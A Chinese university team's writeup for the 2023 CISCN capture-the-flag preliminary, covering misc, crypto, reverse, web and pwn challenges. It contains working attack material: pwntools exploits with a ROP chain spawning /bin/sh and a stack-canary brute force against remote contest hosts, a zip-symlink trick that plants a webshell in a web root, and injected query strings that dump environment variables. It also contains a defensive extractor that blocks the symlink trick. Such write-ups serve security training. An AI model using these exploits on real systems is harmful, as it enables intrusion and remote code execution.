CISCN Dozer Team Writeup

After two days of intense competition from May 27 to May 28, 2023, the two teams fielded by Dozer, the training squad of Jinling Institute of Technology, stood out among 2,494 registered teams and both advanced through the preliminary round of the National College Student Information Security Contest (CISCN) into the offline regional finals.
Dozer2023, led by current squad captain Jia Yunfei, placed 41st in the East China North region; its members were Zhu Xia, Chen Siwei and Wu Yanlin.

The squad's other team, Dozer, led by Song Xuyang, placed 59th in the East China North region; its members were Ji Chengrui, Zhang Sizhan and Ni Chengxin.

Announcement of the finalist list: http://www.ciscn.cn/upload/file/20230531/1685537364913663.pdf
Finalist list: http://www.ciscn.cn/upload/file/20230531/1685537235196805.pdf

Below are our solutions for this contest. Keep working hard and set sail!

Misc

Sign-in

Code: print(open('/flag').read())
This gives the flag.

Encrypted production traffic

Follow the TCP stream tcp.stream eq 0.

Base32-decoding "MMYWMX3GNEYWOXZRGAYDA===" gives the flag.

pyshell

Sandbox escape with a length limit plus a character whitelist; build the expression by string concatenation using only whitelisted characters.

Guocui (mahjong)

a and k are coordinates. Treat the table in the challenge image as the horizontal and vertical axes and fill in each coordinate (a, k) in black.

Crypto

Key based on the SM2 national cryptographic algorithm

Public key A_Public_Key

:::info
7624DAC71A7D3E142979AA800B65005E743F0C62FCB771AC81849316B8E21E16BC3B3EFF9F42C53D1B933C69E8DE20EFD477D8AAD4E595781F50250EA1D1DA21
:::

Private key A_Private_Key

:::info
1F43875CE7F4984973900E242C915CE324574F5A19AA6D348846F96753D9A831
:::

Public key B_Public_Key

:::info
042c5e9a5ee7fa9e83437b5e92c7d695027ecde1807982961adfdf4622275da34bbfcbde575621d81335e7916f656b36de5ba1b7bc003f1b8c5c8a62db625da3d8
:::

Private key B ciphertext

:::info
c882c5209f00c20245e3c967634f81fc3ef398ec039355ff6b6ec2053f6bd6a7
:::

Private key b plaintext

:::info
C2 A1 C9 75 7A D1 97 E8 E9 6D 5C 0F 53 86 DA 0A BB 28 16 11 DA 58 71 24 B1 52 81 85 BB 38 46 EA
:::

c ciphertext

:::info
41fb2d26589b420faee4c498f6b309ead00681bbb28dc4d98c49830489c061ef6917fc524126fbe3c9492c447f8a415414e8301fa9be6938b3edea175890dceaadec874ee0d3e321b4dfa0ef27b93586d8c6df76fbe4b7beae795f566d3fc1580904a375483c5149ddad2fda16c68106
:::

c plaintext

:::info
BD 37 75 32 F5 15 0D DB C6 10 9A E6 93 1D 6B 40
:::

d ciphertext

:::info
4138c6bb7a4ebe754e0e0b313b7b4b9299832e458eb1c5b635200f1782cbcecad7444e6884af2b0733e1448d0205a43dada5e288ce8fc32324c4a48627f5a65204d8ecf80c999bc09a3b0d7b19b936fa082fbdcc8ed818ed05b6caa568ca44a24e2b2e7f7e9d6e3245bae24554758fd0
:::

d plaintext

:::info
5D 19 64 7C E1 AD 02 72 ED 06 96 B9 5D 50 DE 71
:::

Trusted measurement

Command: find * | grep -ra "flag{"
This gives the flag.

Sign_in_passwd

URL encoding:
base64:

Reverse

babyre

Download it; the first line gives the official website.

Go there, import the source to get the compiled project, and analyze it.

In the screenshot the left side is the list and the right side is the logic. There are two operations, letter i of key and letter i-1 of key; combined with the fact that the first ASCII code in the list decodes to "f", this suggests each character is XORed with the previous one. A short script recovers the flag:

ciphertext_list = [102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30]
# Each stored value is key[i] ^ key[i-1], so undo it with a running XOR:
# the first byte is stored as-is, and every later plaintext byte is the
# previous recovered byte XORed with the stored value.
for i in range(1, len(ciphertext_list)):
    ciphertext_list[i] = ciphertext_list[i - 1] ^ ciphertext_list[i]
print(''.join(chr(c) for c in ciphertext_list))

Web

dumpit

The challenge hint says to try ?db=&table_2_query= or ?db=&table_2_dump=.
First try ?db=ctf&table_2_query=flag1

It looks like it queries records from a table.
?db=ctf&table_2_dump=flag1 is the other one.

That one looks like an access log.
Queried a lot of things; all fake flags.

With ?db=ctf&table_2_dump=flag1 the log results were always the same, so it seemed flag1 was being filtered. Prefixing with %0a made the full SQL statement log come out.

After reading through it there was still no real flag, so the flag probably is not in the database. In an earlier template-injection challenge the flag was in /etc/passwd, tmp or env, so we guessed it might be in the environment variables:
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump=env
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_query=env
Nothing. Try the %0a bypass again (a leading space also works):
http://eci-2zeifb8rijs2733nu61o.cloudeci1.ichunqiu.com:8888/?db=ctf&table_2_dump= env

This reveals the flag.

unzip

ln -s /var/www/html test

Create a symlink named test pointing to /var/www/html and zip it (test.zip).

Then write a webshell inside a directory named test.

Zip that as well (test1.zip); it contains test/test.php.

Upload test.zip first, then test1.zip.
After the first upload the server has /tmp/test, a symlink to /var/www/html; when test1.zip is then uploaded and extracted, test.php is actually written into /tmp/test, i.e. into the web root.
Then cat the flag.
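As an added defensive example (not part of the original writeup), this Python extractor refuses the two things the trick above relies on: a symlink entry inside the archive, and a later entry written through a link that already exists under the upload directory. The archives and paths are constructed in a temp directory; `webroot` stands in for /var/www/html.

```python
import os, stat, tempfile, zipfile

def safe_extract(zip_path: str, dest: str) -> list:
    """Extract into dest, refusing symlink entries and any path that resolves outside dest."""
    dest_real = os.path.realpath(dest)
    names = []
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK((info.external_attr >> 16) & 0xFFFF):
                raise ValueError(f"symlink entry: {info.filename}")
            # realpath follows a link already present under dest (the writeup's
            # 'test' -> /var/www/html), so writes through it are caught like '../'
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"entry escapes dest: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            names.append(info.filename)
    return names

def try_extract(zip_path: str, dest: str) -> str:
    try:
        safe_extract(zip_path, dest)
        return "ok"
    except ValueError:
        return "rejected"

def demo() -> dict:
    """Replay the writeup's two uploads on constructed archives in a temp dir."""
    tmp = tempfile.mkdtemp()
    dest, webroot = os.path.join(tmp, "uploads"), os.path.join(tmp, "webroot")
    for d in (dest, webroot):  # webroot stands in for /var/www/html
        os.makedirs(d)
    # upload 1: test.zip whose only entry is the symlink 'test' -> webroot
    link = zipfile.ZipInfo("test")
    link.external_attr = (stat.S_IFLNK | 0o777) << 16
    with zipfile.ZipFile(os.path.join(tmp, "test.zip"), "w") as zf:
        zf.writestr(link, webroot)
    first = try_extract(os.path.join(tmp, "test.zip"), dest)
    # assume a naive unzip did create the link, then upload 2: test/test.php
    os.symlink(webroot, os.path.join(dest, "test"))
    with zipfile.ZipFile(os.path.join(tmp, "test1.zip"), "w") as zf:
        zf.writestr("test/test.php", "constructed placeholder, not a webshell")
    second = try_extract(os.path.join(tmp, "test1.zip"), dest)
    return {"symlink_zip": first, "through_link": second,
            "webroot_untouched": not os.path.exists(os.path.join(webroot, "test.php"))}
```

Calling demo() shows both uploads rejected and nothing written into webroot.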

Pwn

Barbecue stall (烧烤摊儿)

Since the binary is statically linked, the gadgets can be found directly inside the program.

Modify money from the pijiu (beer) option: money is an unsigned integer, so just enter a negative number (-999999).

Enter the vip function to modify the value of own.
Use ROPgadget --binary p3 --ropchain to obtain the payload.

exp

from pwn import *
from struct import pack

sh = remote('39.105.187.49', 34749)
# sh = process('./p3')
elf = ELF('./p3')

# menu 1 (pijiu): money is unsigned, so a negative quantity makes it huge
sh.sendlineafter(b'> ', b'1')
sh.sendlineafter(b'\n', b'1')
sh.sendlineafter(b'\n', b'-999999')
# menu 4: vip (modify own)
sh.sendlineafter(b'> ', b'4')
# menu 5: the input sent below overflows the stack buffer
sh.sendlineafter(b'> ', b'5')

# ROP chain from ROPgadget --ropchain: store "/bin//sh" in .data, then execve
p = b''
p += b'a' * 0x28
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040264f) # pop rdi ; ret
p += pack('<Q', 0x00000000004e60e0) # @ .data
p += pack('<Q', 0x000000000040a67e) # pop rsi ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack('<Q', 0x00000000004e60e8) # @ .data + 8
p += pack('<Q', 0x4141414141414141) # padding
p += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000496710) * 59 # add rax, 1 ; ret (59 times: rax = 59 = SYS_execve)
p += pack('<Q', 0x0000000000402404) # syscall
sh.sendline(p)
sh.interactive()


funcanary

The main function is shown below; PIE (address randomization) and the stack canary are enabled.

Stepping into the function, there is a read call, which is the brute-force point.

There is also a fork() call, so the program keeps serving from child processes that all share the parent's canary; a wrong guess only kills one child. So we brute-force the canary byte by byte.
The exploit is as follows:

from pwn import *

p = remote("39.105.26.155", 32292)
p.recvuntil(b'welcome\n')

# The lowest canary byte is always 0x00; brute-force the remaining 7 bytes one
# at a time. A correct byte leaves the child alive (it prints "fun"), a wrong
# one only crashes that child and the parent serves the next attempt.
canary = b'\x00'
for k in range(7):
    for i in range(256):
        payload = b'a' * 0x68 + canary + bytes([i])
        p.send(payload)
        data = p.recvuntil(b"welcome\n")
        print(data)
        if b"fun" in data:
            canary += bytes([i])
            print("canary is:", canary.hex())
            break

# Overwrite only the low 2 bytes of the saved return address: with PIE the low
# 12 bits are fixed, so 0x1231 reaches the backdoor with probability 1/16.
back_door = 0x1231
payload = b'a' * 0x68 + canary + b'a' * 8 + p16(back_door)

p.send(payload)
p.interactive()
Posted @ 2023-05-28 23:22 by 浮虚千年